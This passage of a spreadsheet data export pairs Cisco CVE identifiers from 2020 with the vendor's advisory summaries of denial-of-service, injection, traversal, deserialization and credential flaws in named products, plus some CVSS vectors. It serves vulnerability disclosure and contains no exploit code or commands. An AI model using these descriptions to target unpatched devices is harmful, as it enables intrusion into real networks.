    <t>A vulnerability in Security Group Tag Exchange Protocol (SXP) in Cisco IOS Software, Cisco IOS XE Software, and Cisco NX-OS Software could allow an unauthenticated, remote attacker to cause the affected device to reload, resulting in a denial of service (DoS) condition. The vulnerability exists because crafted SXP packets are mishandled. An attacker could exploit this vulnerability by sending specifically crafted SXP packets to the affected device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a DoS condition.</t>
  </si>
  <si>
    <t>CVE-2020-3229</t>
  </si>
  <si>
    <t>A vulnerability in Role Based Access Control (RBAC) functionality of Cisco IOS XE Web Management Software could allow a Read-Only authenticated, remote attacker to execute commands or configuration changes as an Admin user. The vulnerability is due to incorrect handling of RBAC for the administration GUI. An attacker could exploit this vulnerability by sending a modified HTTP request to the affected device. An exploit could allow the attacker as a Read-Only user to execute CLI commands or configuration changes as if they were an Admin user.</t>
  </si>
  <si>
    <t>CVE-2020-3230</t>
  </si>
  <si>
    <t>A vulnerability in the Internet Key Exchange Version 2 (IKEv2) implementation in Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to prevent IKEv2 from establishing new security associations. The vulnerability is due to incorrect handling of crafted IKEv2 SA-Init packets. An attacker could exploit this vulnerability by sending crafted IKEv2 SA-Init packets to the affected device. An exploit could allow the attacker to cause the affected device to reach the maximum incoming negotiation limits and prevent further IKEv2 security associations from being formed.</t>
  </si>
  <si>
    <t>CVE-2020-3231</t>
  </si>
  <si>
    <t>A vulnerability in the 802.1X feature of Cisco Catalyst 2960-L Series Switches and Cisco Catalyst CDB-8P Switches could allow an unauthenticated, adjacent attacker to forward broadcast traffic before being authenticated on the port. The vulnerability exists because broadcast traffic that is received on the 802.1X-enabled port is mishandled. An attacker could exploit this vulnerability by sending broadcast traffic on the port before being authenticated. A successful exploit could allow the attacker to send and receive broadcast traffic on the 802.1X-enabled port before authentication.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N</t>
  </si>
  <si>
    <t>CVE-2020-3232</t>
  </si>
  <si>
    <t>A vulnerability in the Simple Network Management Protocol (SNMP) implementation in Cisco ASR 920 Series Aggregation Services Router model ASR920-12SZ-IM could allow an authenticated, remote attacker to cause the device to reload. The vulnerability is due to incorrect handling of data that is returned for Cisco Discovery Protocol queries to SNMP. An attacker could exploit this vulnerability by sending a request for Cisco Discovery Protocol information by using SNMP. An exploit could allow the attacker to cause the affected device to reload, resulting in a denial of service (DoS) condition.</t>
  </si>
  <si>
    <t>CVE-2020-3233</t>
  </si>
  <si>
    <t>A vulnerability in the web-based Local Manager interface of the Cisco IOx Application Framework could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the web-based Local Manager interface of an affected device. The attacker must have valid Local Manager credentials. The vulnerability is due to insufficient validation of user-supplied input by the web-based Local Manager interface of the affected software. An attacker could exploit this vulnerability by injecting malicious code into a system settings tab. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected web interface or allow the attacker to access sensitive browser-based information.</t>
  </si>
  <si>
    <t>CVE-2020-3234</t>
  </si>
  <si>
    <t>A vulnerability in the virtual console authentication of Cisco IOS Software for Cisco 809 and 829 Industrial Integrated Services Routers (Industrial ISRs) and Cisco 1000 Series Connected Grid Routers (CGR1000) could allow an authenticated but low-privileged, local attacker to log in to the Virtual Device Server (VDS) of an affected device by using a set of default credentials. The vulnerability is due to the presence of weak, hard-coded credentials. An attacker could exploit this vulnerability by authenticating to the targeted device and then connecting to VDS through the device&amp;rsquo;s virtual console by using the static credentials. A successful exploit could allow the attacker to access the Linux shell of VDS as the root user.</t>
  </si>
  <si>
    <t>CVE-2020-3235</t>
  </si>
  <si>
    <t>A vulnerability in the Simple Network Management Protocol (SNMP) subsystem of Cisco IOS Software and Cisco IOS XE Software on Catalyst 4500 Series Switches could allow an authenticated, remote attacker to cause a denial of service (DoS) condition. The vulnerability is due to insufficient input validation when the software processes specific SNMP object identifiers. An attacker could exploit this vulnerability by sending a crafted SNMP packet to an affected device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a DoS condition. Note: To exploit this vulnerability by using SNMPv2c or earlier, the attacker must know the SNMP read-only community string for an affected system. To exploit this vulnerability by using SNMPv3, the attacker must know the user credentials for the affected system.</t>
  </si>
  <si>
    <t>CVE-2020-3236</t>
  </si>
  <si>
    <t>A vulnerability in the CLI of Cisco Enterprise NFV Infrastructure Software (NFVIS) could allow an authenticated, local attacker to gain root shell access to the underlying operating system and overwrite or read arbitrary files. The attacker would need valid administrative credentials. This vulnerability is due to improper input validation of CLI command arguments. An attacker could exploit this vulnerability by using path traversal techniques when executing a vulnerable command. A successful exploit could allow the attacker to gain root shell access to the underlying operating system and overwrite or read arbitrary files on an affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3237</t>
  </si>
  <si>
    <t>A vulnerability in the Cisco Application Framework component of the Cisco IOx application environment could allow an authenticated, local attacker to overwrite arbitrary files in the virtual instance that is running on the affected device. The vulnerability is due to insufficient path restriction enforcement. An attacker could exploit this vulnerability by including a crafted file in an application package. An exploit could allow the attacker to overwrite files.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L</t>
  </si>
  <si>
    <t>CVE-2020-3238</t>
  </si>
  <si>
    <t>A vulnerability in the Cisco Application Framework component of the Cisco IOx application environment could allow an authenticated, remote attacker to write or modify arbitrary files in the virtual instance that is running on the affected device. The vulnerability is due to insufficient input validation of user-supplied application packages. An attacker who can upload a malicious package within Cisco IOx could exploit the vulnerability to modify arbitrary files. The impacts of a successful exploit are limited to the scope of the virtual instance and do not affect the device that is hosting Cisco IOx.</t>
  </si>
  <si>
    <t>CVE-2020-3239</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the REST API of Cisco UCS Director and Cisco UCS Director Express for Big Data may allow a remote attacker to bypass authentication or conduct directory traversal attacks on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.</t>
  </si>
  <si>
    <t>CVE-2020-3240</t>
  </si>
  <si>
    <t>CVE-2020-3241</t>
  </si>
  <si>
    <t>A vulnerability in the orchestration tasks of Cisco UCS Director could allow an authenticated, remote attacker to perform a path traversal attack on an affected device. The vulnerability is due to insufficient validation of user-supplied input on the web-based management interface. An attacker could exploit this vulnerability by creating a task with specific configuration parameters. A successful exploit could allow the attacker to overwrite arbitrary files in the file system of an affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3242</t>
  </si>
  <si>
    <t>A vulnerability in the REST API of Cisco UCS Director could allow an authenticated, remote attacker with administrative privileges to obtain confidential information from an affected device. The vulnerability exists because confidential information is returned as part of an API response. An attacker could exploit this vulnerability by sending a crafted request to the API. A successful exploit could allow the attacker to obtain the API key of another user, which would allow the attacker to impersonate the account of that user on the affected device. To exploit this vulnerability, the attacker must have administrative privileges on the device.</t>
  </si>
  <si>
    <t>CVE-2020-3243</t>
  </si>
  <si>
    <t>CVE-2020-3244</t>
  </si>
  <si>
    <t>A vulnerability in the Enhanced Charging Service (ECS) functionality of Cisco ASR 5000 Series Aggregation Services Routers could allow an unauthenticated, remote attacker to bypass the traffic classification rules on an affected device. The vulnerability is due to insufficient input validation of user traffic going through an affected device. An attacker could exploit this vulnerability by sending a malformed HTTP request to an affected device. A successful exploit could allow the attacker to bypass the traffic classification rules and potentially avoid being charged for traffic consumption.</t>
  </si>
  <si>
    <t>CVE-2020-3245</t>
  </si>
  <si>
    <t>A vulnerability in the web application of Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an unauthenticated, remote attacker to create arbitrary user accounts. The vulnerability is due to the lack of authorization controls in the web application. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to add user accounts to the configuration of an affected device. These accounts would not be administrator or operator accounts.</t>
  </si>
  <si>
    <t>CVE-2020-3246</t>
  </si>
  <si>
    <t>A vulnerability in the web server of Cisco Umbrella could allow an unauthenticated, remote attacker to perform a carriage return line feed (CRLF) injection attack against a user of an affected service. The vulnerability is due to insufficient validation of user input. An attacker could exploit this vulnerability by persuading a user to access a crafted URL. A successful exploit could allow the attacker to inject arbitrary HTTP headers into valid HTTP responses sent to the browser of the user.</t>
  </si>
  <si>
    <t>CVE-2020-3247</t>
  </si>
  <si>
    <t>CVE-2020-3248</t>
  </si>
  <si>
    <t>CVE-2020-3249</t>
  </si>
  <si>
    <t>CVE-2020-3250</t>
  </si>
  <si>
    <t>CVE-2020-3251</t>
  </si>
  <si>
    <t>CVE-2020-3252</t>
  </si>
  <si>
    <t>CVE-2020-3253</t>
  </si>
  <si>
    <t>A vulnerability in the support tunnel feature of Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, local attacker to access the shell of an affected device even though expert mode is disabled. The vulnerability is due to improper configuration of the support tunnel feature. An attacker could exploit this vulnerability by enabling the support tunnel, setting a key, and deriving the tunnel password. A successful exploit could allow the attacker to run any system command with root access on an affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3254</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the Media Gateway Control Protocol (MGCP) inspection feature of Cisco Adaptive Security Appliance (ASA) Software and Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerabilities are due to inefficient memory management. An attacker could exploit these vulnerabilities by sending crafted MGCP packets through an affected device. An exploit could allow the attacker to cause memory exhaustion resulting in a restart of an affected device, causing a DoS condition for traffic traversing the device.</t>
  </si>
  <si>
    <t>CVE-2020-3255</t>
  </si>
  <si>
    <t>A vulnerability in the packet processing functionality of Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to inefficient memory management. An attacker could exploit this vulnerability by sending a high rate of IPv4 or IPv6 traffic through an affected device. This traffic would need to match a configured block action in an access control policy. An exploit could allow the attacker to cause a memory exhaustion condition on the affected device, which would result in a DoS for traffic transiting the device, as well as sluggish performance of the management interface. Once the flood is stopped, performance should return to previous states.</t>
  </si>
  <si>
    <t>CVE-2020-3256</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Hosted Collaboration Mediation Fulfillment (HCM-F) Software could allow an authenticated, remote attacker to gain read access to information that is stored on an affected system. To exploit this vulnerability, an attacker would need administrative privileges on the Cisco HCM-F Software. The vulnerability is due to improper handling of XML External Entity (XXE) entries when parsing certain XML files. An attacker could exploit this vulnerability by sending malicious requests that contain references in XML entities to an affected system. A successful exploit could allow the attacker to retrieve files from the local system, resulting in the disclosure of sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-3257</t>
  </si>
  <si>
    <t>CVE-2020-3258</t>
  </si>
  <si>
    <t>CVE-2020-3259</t>
  </si>
  <si>
    <t>A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to retrieve memory contents on an affected device, which could lead to the disclosure of confidential information. The vulnerability is due to a buffer tracking issue when the software parses invalid URLs that are requested from the web services interface. An attacker could exploit this vulnerability by sending a crafted GET request to the web services interface. A successful exploit could allow the attacker to retrieve memory contents, which could lead to the disclosure of confidential information. Note: This vulnerability affects only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section.</t>
  </si>
  <si>
    <t>CVE-2020-3260</t>
  </si>
  <si>
    <t>A vulnerability in Cisco Aironet Series Access Points Software could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to the improper processing of client packets that are sent to an affected access point (AP). An attacker could exploit this vulnerability by sending a large number of sustained client packets to the affected AP. A successful exploit could allow the attacker to cause the affected AP to crash, resulting in a DoS condition.</t>
  </si>
  <si>
    <t>CVE-2020-3261</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Mobility Express Software could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack on an affected system. The vulnerability is due to insufficient CSRF protections for the web-based management interface on an affected device. An attacker could exploit this vulnerability by persuading a user with an active session on an affected device to follow a malicious link. A successful exploit could allow the attacker to perform arbitrary actions, including modifying the configuration, with the privilege level of the user.</t>
  </si>
  <si>
    <t>CVE-2020-3262</t>
  </si>
  <si>
    <t>A vulnerability in the Control and Provisioning of Wireless Access Points (CAPWAP) protocol handler of Cisco Wireless LAN Controller (WLC) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to insufficient validation of CAPWAP packets. An attacker could exploit this vulnerability by sending a malformed CAPWAP packet to an affected device. A successful exploit could allow the attacker to cause the affected device to restart, resulting in a DoS condition.</t>
  </si>
  <si>
    <t>CVE-2020-3263</t>
  </si>
  <si>
    <t>A vulnerability in Cisco Webex Meetings Desktop App could allow an unauthenticated, remote attacker to execute programs on an affected end-user system. The vulnerability is due to improper validation of input that is supplied to application URLs. The attacker could exploit this vulnerability by persuading a user to follow a malicious URL. A successful exploit could allow the attacker to cause the application to execute other programs that are already present on the end-user system. If malicious files are planted on the system or on an accessible network file path, the attacker could execute arbitrary code on the affected system.</t>
  </si>
  <si>
    <t>CVE-2020-3264</t>
  </si>
  <si>
    <t>A vulnerability in Cisco SD-WAN Solution software could allow an authenticated, local attacker to cause a buffer overflow on an affected device. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending crafted traffic to an affected device. A successful exploit could allow the attacker to gain access to information that they are not authorized to access and make changes to the system that they are not authorized to make.</t>
  </si>
  <si>
    <t>CVE-2020-3265</t>
  </si>
  <si>
    <t>A vulnerability in Cisco SD-WAN Solution software could allow an authenticated, local attacker to elevate privileges to root on the underlying operating system. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending a crafted request to an affected system. A successful exploit could allow the attacker to gain root-level privileges.</t>
  </si>
  <si>
    <t>CVE-2020-3266</t>
  </si>
  <si>
    <t>A vulnerability in the CLI of Cisco SD-WAN Solution software could allow an authenticated, local attacker to inject arbitrary commands that are executed with root privileges. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by authenticating to the device and submitting crafted input to the CLI utility. The attacker must be authenticated to access the CLI utility. A successful exploit could allow the attacker to execute commands with root privileges.</t>
  </si>
  <si>
    <t>CVE-2020-3267</t>
  </si>
  <si>
    <t>A vulnerability in the API subsystem of Cisco Unified Contact Center Express (Unified CCX) could allow an authenticated, remote attacker to change the availability state of any agent. The vulnerability is due to insufficient authorization enforcement on an affected system. An attacker could exploit this vulnerability by authenticating to an affected system with valid agent credentials and performing a specific API call with crafted input. A successful exploit could allow the attacker to change the availability state of an agent, potentially causing a denial of service condition.</t>
  </si>
  <si>
    <t>CVE-2020-3268</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the web-based management interface of Cisco RV110W, RV130, RV130W, and RV215W Series Routers could allow an authenticated, remote attacker with administrative privileges to execute arbitrary commands. For more information about these vulnerabilities, see the Details section of this advisory.</t>
  </si>
  <si>
    <t>CVE-2020-3269</t>
  </si>
  <si>
    <t>CVE-2020-3272</t>
  </si>
  <si>
    <t>A vulnerability in the DHCP server of Cisco Prime Network Registrar could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to insufficient input validation of incoming DHCP traffic. An attacker could exploit this vulnerability by sending a crafted DHCP request to an affected device. A successful exploit could allow the attacker to cause a restart of the DHCP server process, causing a DoS condition.</t>
  </si>
  <si>
    <t>CVE-2020-3273</t>
  </si>
  <si>
    <t>A vulnerability in the 802.11 Generic Advertisement Service (GAS) frame processing function of Cisco Wireless LAN Controller (WLC) Software could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a denial of service (DoS). The vulnerability is due to incomplete input validation of the 802.11 GAS frames that are processed by an affected device. An attacker could exploit this vulnerability by sending a crafted 802.11 GAS frame over the air to an access point (AP), and that frame would then be relayed to the affected WLC. Also, an attacker with Layer 3 connectivity to the WLC could exploit this vulnerability by sending a malicious 802.11 GAS payload in a Control and Provisioning of Wireless Access Points (CAPWAP) packet to the device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a DoS.</t>
  </si>
  <si>
    <t>CVE-2020-3274</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV320 and RV325 Series Routers and Cisco Small Business RV016, RV042, and RV082 Routers could allow an authenticated, remote attacker with administrative privileges to execute arbitrary commands on an affected device. The vulnerabilities exist because the web-based management interface does not properly validate user-supplied input to scripts. An attacker with administrative privileges that are sufficient to log in to the web-based management interface could exploit each vulnerability by sending malicious requests to an affected device. A successful exploit could allow the attacker to execute arbitrary commands with root privileges on the underlying operating system.</t>
  </si>
  <si>
    <t>CVE-2020-3275</t>
  </si>
  <si>
    <t>CVE-2020-3276</t>
  </si>
  <si>
    <t>CVE-2020-3277</t>
  </si>
  <si>
    <t>CVE-2020-3278</t>
  </si>
  <si>
    <t>CVE-2020-3279</t>
  </si>
  <si>
    <t>CVE-2020-3280</t>
  </si>
  <si>
    <t>A vulnerability in the Java Remote Management Interface of Cisco Unified Contact Center Express (Unified CCX) could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. The vulnerability is due to insecure deserialization of user-supplied content by the affected software. An attacker could exploit this vulnerability by sending a malicious serialized Java object to a specific listener on an affected system. A successful exploit could allow the attacker to execute arbitrary code as the root user on an affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3281</t>
  </si>
  <si>
    <t>A vulnerability in the audit logging component of Cisco Digital Network Architecture (DNA) Center could allow an authenticated, remote attacker to view sensitive information in clear text. The vulnerability is due to the storage of certain unencrypted credentials. An attacker could exploit this vulnerability by accessing the audit logs and obtaining credentials that they may not normally have access to. A successful exploit could allow the attacker to use those credentials to discover and manage network devices.</t>
  </si>
  <si>
    <t>CVE-2020-3282</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Unified Communications Manager, Cisco Unified Communications Manager Session Management Edition, Cisco Unified Communications Manager IM &amp;amp; Presence Service, and Cisco Unity Connection could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of the affected software.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20-3283</t>
  </si>
  <si>
    <t>A vulnerability in the Secure Sockets Layer (SSL)/Transport Layer Security (TLS) handler of Cisco Firepower Threat Defense (FTD) Software when running on the Cisco Firepower 1000 Series platform could allow an unauthenticated, remote attacker to trigger a denial of service (DoS) condition on an affected device. The vulnerability is due to a communication error between internal functions. An attacker could exploit this vulnerability by sending a crafted SSL/TLS message to an affected device. A successful exploit could allow the attacker to cause a buffer underrun, which leads to a crash. The crash causes the affected device to reload.</t>
  </si>
  <si>
    <t>CVE-2020-3284</t>
  </si>
  <si>
    <t>A vulnerability in the enhanced Preboot eXecution Environment (PXE) boot loader for Cisco IOS XR 64-bit Software could allow an unauthenticated, remote attacker to execute unsigned code during the PXE boot process on an affected device. The PXE boot loader is part of the BIOS and runs over the management interface of hardware platforms that are running Cisco IOS XR Software only. The vulnerability exists because internal commands that are issued when the PXE network boot process is loading a software image are not properly verified. An attacker could exploit this vulnerability by compromising the PXE boot server and replacing a valid software image with a malicious one. Alternatively, the attacker could impersonate the PXE boot server and send a PXE boot reply with a malicious file. A successful exploit could allow the attacker to execute unsigned code on the affected device. Note: To fix this vulnerability, both the Cisco IOS XR Software and the BIOS must be upgraded. The BIOS code is included in Cisco IOS XR Software but might require additional installation steps. For further information, see the Fixed Software section of this advisory.</t>
  </si>
  <si>
    <t>CVE-2020-3285</t>
  </si>
  <si>
    <t>A vulnerability in the Transport Layer Security version 1.3 (TLS 1.3) policy with URL category functionality for Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to bypass a configured TLS 1.3 policy to block traffic for a specific URL. The vulnerability is due to a logic error with Snort handling of the connection with the TLS 1.3 policy and URL category configuration. An attacker could exploit this vulnerability by sending crafted TLS 1.3 connections to an affected device. A successful exploit could allow the attacker to bypass the TLS 1.3 policy and access URLs that are outside the affected device and normally would be dropped.</t>
  </si>
  <si>
    <t>CVE-2020-3286</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV320 and RV325 Series Routers and Cisco Small Business RV016, RV042, and RV082 Routers could allow an authenticated, remote attacker with administrative privileges to execute arbitrary code on an affected device. The vulnerabilities are due to insufficient boundary restrictions on user-supplied input to scripts in the web-based management interface. An attacker with administrative privileges that are sufficient to log in to the web-based management interface could exploit each vulnerability by sending crafted requests that contain overly large values to an affected device, causing a stack overflow. A successful exploit could allow the attacker to cause the device to crash or allow the attacker to execute arbitrary code with root privileges on the underlying operating system.</t>
  </si>
  <si>
    <t>CVE-2020-3287</t>
  </si>
  <si>
    <t>CVE-2020-3288</t>
  </si>
  <si>
    <t>CVE-2020-3289</t>
  </si>
  <si>
    <t>CVE-2020-3290</t>
  </si>
  <si>
    <t>CVE-2020-3291</t>
  </si>
  <si>
    <t>CVE-2020-3292</t>
  </si>
  <si>
    <t>CVE-2020-3293</t>
  </si>
  <si>
    <t>CVE-2020-3294</t>
  </si>
  <si>
    <t>CVE-2020-3295</t>
  </si>
  <si>
    <t>CVE-2020-3296</t>
  </si>
  <si>
    <t>CVE-2020-3297</t>
  </si>
  <si>
    <t>A vulnerability in session management for the web-based interface of Cisco Small Business Smart and Managed Switches could allow an unauthenticated, remote attacker to defeat authentication protections and gain unauthorized access to the management interface. The attacker could obtain the privileges of the highjacked session account, which could include administrator privileges on the device. The vulnerability is due to the use of weak entropy generation for session identifier values. An attacker could exploit this vulnerability to determine a current session identifier through brute force and reuse that session identifier to take over an ongoing session. In this way, an attacker could take actions within the management interface with privileges up to the level of the administrative user.</t>
  </si>
  <si>
    <t>CVE-2020-3298</t>
  </si>
  <si>
    <t>A vulnerability in the Open Shortest Path First (OSPF) implementation of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause the reload of an affected device, resulting in a denial of service (DoS) condition. The vulnerability is due to improper memory protection mechanisms while processing certain OSPF packets. An attacker could exploit this vulnerability by sending a series of malformed OSPF packets in a short period of time to an affected device. A successful exploit could allow the attacker to cause a reload of the affected device, resulting in a DoS condition for client traffic that is traversing the device.</t>
  </si>
  <si>
    <t>CVE-2020-3299</t>
  </si>
  <si>
    <t>Multiple Cisco products are affected by a vulnerability in the Snort detection engine that could allow an unauthenticated, remote attacker to bypass a configured File Policy for HTTP. The vulnerability is due to incorrect detection of modified HTTP packets used in chunked responses. An attacker could exploit this vulnerability by sending crafted HTTP packets through an affected device. A successful exploit could allow the attacker to bypass a configured File Policy for HTTP packets and deliver a malicious payload.</t>
  </si>
  <si>
    <t>CVE-2020-3301</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in Cisco Firepower Management Center (FMC) Software and Cisco Firepower User Agent Software could allow an attacker to access a sensitive part of an affected system with a high-privileged account. For more information about these vulnerabilities, see the Details section of this advisory.</t>
  </si>
  <si>
    <t>CVE-2020-3302</t>
  </si>
  <si>
    <t>A vulnerability in the web UI of Cisco Firepower Management Center (FMC) Software could allow an authenticated, remote attacker to overwrite files on the file system of an affected device. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by uploading a crafted file to the web UI on an affected device. A successful exploit could allow the attacker to overwrite files on the file system of the affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3303</t>
  </si>
  <si>
    <t>A vulnerability in the Internet Key Exchange version 1 (IKEv1) feature of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition. The vulnerability is due to improper management of system memory. An attacker could exploit this vulnerability by sending malicious IKEv1 traffic to an affected device. A successful exploit could allow the attacker to cause a DoS condition on the affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3304</t>
  </si>
  <si>
    <t>A vulnerability in the web interface of Cisco Adaptive Security Appliance (ASA) Software and Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. The vulnerability is due to a lack of proper input validation of HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the attacker to cause a DoS condition. Note: This vulnerability applies to IP Version 4 (IPv4) and IP Version 6 (IPv6) HTTP traffic.</t>
  </si>
  <si>
    <t>CVE-2020-3305</t>
  </si>
  <si>
    <t>A vulnerability in the implementation of the Border Gateway Protocol (BGP) module in Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition. The vulnerability is due to incorrect processing of certain BGP packets. An attacker could exploit this vulnerability by sending a crafted BGP packet. A successful exploit could allow the attacker to cause a DoS condition on the affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3306</t>
  </si>
  <si>
    <t>A vulnerability in the DHCP module of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on the affected device. The vulnerability is due to incorrect processing of certain DHCP packets. An attacker could exploit this vulnerability by sending a crafted DHCP packet to the affected device. A successful exploit could allow the attacker to cause a DoS condition on the affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3307</t>
  </si>
  <si>
    <t>A vulnerability in the web UI of Cisco Firepower Management Center (FMC) Software could allow an unauthenticated, remote attacker to write arbitrary entries to the log file on an affected device. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to send incorrect information to the system log on the affected system.</t>
  </si>
  <si>
    <t>CVE-2020-3308</t>
  </si>
  <si>
    <t>A vulnerability in the Image Signature Verification feature of Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, remote attacker with administrator-level credentials to install a malicious software patch on an affected device. The vulnerability is due to improper verification of digital signatures for patch images. An attacker could exploit this vulnerability by crafting an unsigned software patch to bypass signature checks and loading it on an affected device. A successful exploit could allow the attacker to boot a malicious software patch image.</t>
  </si>
  <si>
    <t>CVE-2020-3309</t>
  </si>
  <si>
    <t>A vulnerability in Cisco Firepower Device Manager (FDM) On-Box software could allow an authenticated, remote attacker to overwrite arbitrary files on the underlying operating system of an affected device. The vulnerability is due to improper input validation. An attacker could exploit this vulnerability by uploading a malicious file to an affected device. A successful exploit could allow the attacker to overwrite arbitrary files on as well as modify the underlying operating system of an affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3310</t>
  </si>
  <si>
    <t>A vulnerability in the XML parser code of Cisco Firepower Device Manager On-Box software could allow an authenticated, remote attacker to cause an affected system to become unstable or reload. The vulnerability is due to insufficient hardening of the XML parser configuration. An attacker could exploit this vulnerability in multiple ways using a malicious file: An attacker with administrative privileges could upload a malicious XML file on the system and cause the XML code to parse the malicious file. An attacker with Clientless Secure Sockets Layer (SSL) VPN access could exploit this vulnerability by sending a crafted XML file. A successful exploit would allow the attacker to crash the XML parser process, which could cause system instability, memory exhaustion, and in some cases lead to a reload of the affected system.</t>
  </si>
  <si>
    <t>CVE-2020-3311</t>
  </si>
  <si>
    <t>A vulnerability in the web interface of Cisco Firepower Management Center (FMC) Software could allow an unauthenticated, remote attacker to redirect a user to a malicious web page. The vulnerability is due to improper input validation of HTTP request parameters. An attacker could exploit this vulnerability by intercepting and modifying an HTTP request from a user. A successful exploit could allow the attacker to redirect the user to a specific malicious web page.</t>
  </si>
  <si>
    <t>CVE-2020-3312</t>
  </si>
  <si>
    <t>A vulnerability in the application policy configuration of Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to gain unauthorized read access to sensitive data on an affected device. The vulnerability is due to insufficient application identification. An attacker could exploit this vulnerability by sending crafted traffic to an affected device. A successful exploit could allow the attacker to gain unauthorized read access to sensitive data.</t>
  </si>
  <si>
    <t>CVE-2020-3313</t>
  </si>
  <si>
    <t>A vulnerability in the web UI of Cisco Firepower Management Center (FMC) Software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of the FMC Software. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or to access sensitive, browser-based information.</t>
  </si>
  <si>
    <t>CVE-2020-3314</t>
  </si>
  <si>
    <t>A vulnerability in the file scan process of Cisco AMP for Endpoints Mac Connector Software could cause the scan engine to crash during the scan of local files, resulting in a restart of the AMP Connector and a denial of service (DoS) condition of the Cisco AMP for Endpoints service. The vulnerability is due to insufficient input validation of specific file attributes. An attacker could exploit this vulnerability by providing a crafted file to a user of an affected system. A successful exploit could allow the attacker to cause the Cisco AMP for Endpoints service to crash, resulting in missed detection and logging of the potentially malicious file. Continued attempts to scan the file could result in a DoS condition of the Cisco AMP for Endpoints service.</t>
  </si>
  <si>
    <t>CVE-2020-3315</t>
  </si>
  <si>
    <t>Multiple Cisco products are affected by a vulnerability in the Snort detection engine that could allow an unauthenticated, remote attacker to bypass the configured file policies on an affected system. The vulnerability is due to errors in how the Snort detection engine handles specific HTTP responses. An attacker could exploit this vulnerability by sending crafted HTTP packets that would flow through an affected system. A successful exploit could allow the attacker to bypass the configured file policies and deliver a malicious payload to the protected network.</t>
  </si>
  <si>
    <t>CVE-2020-3317</t>
  </si>
  <si>
    <t>A vulnerability in the ssl_inspection component of Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to crash Snort instances. The vulnerability is due to insufficient input validation in the ssl_inspection component. An attacker could exploit this vulnerability by sending a malformed TLS packet through a Cisco Adaptive Security Appliance (ASA). A successful exploit could allow the attacker to crash a Snort instance, resulting in a denial of service (DoS) condition.</t>
  </si>
  <si>
    <t>CVE-2020-3318</t>
  </si>
  <si>
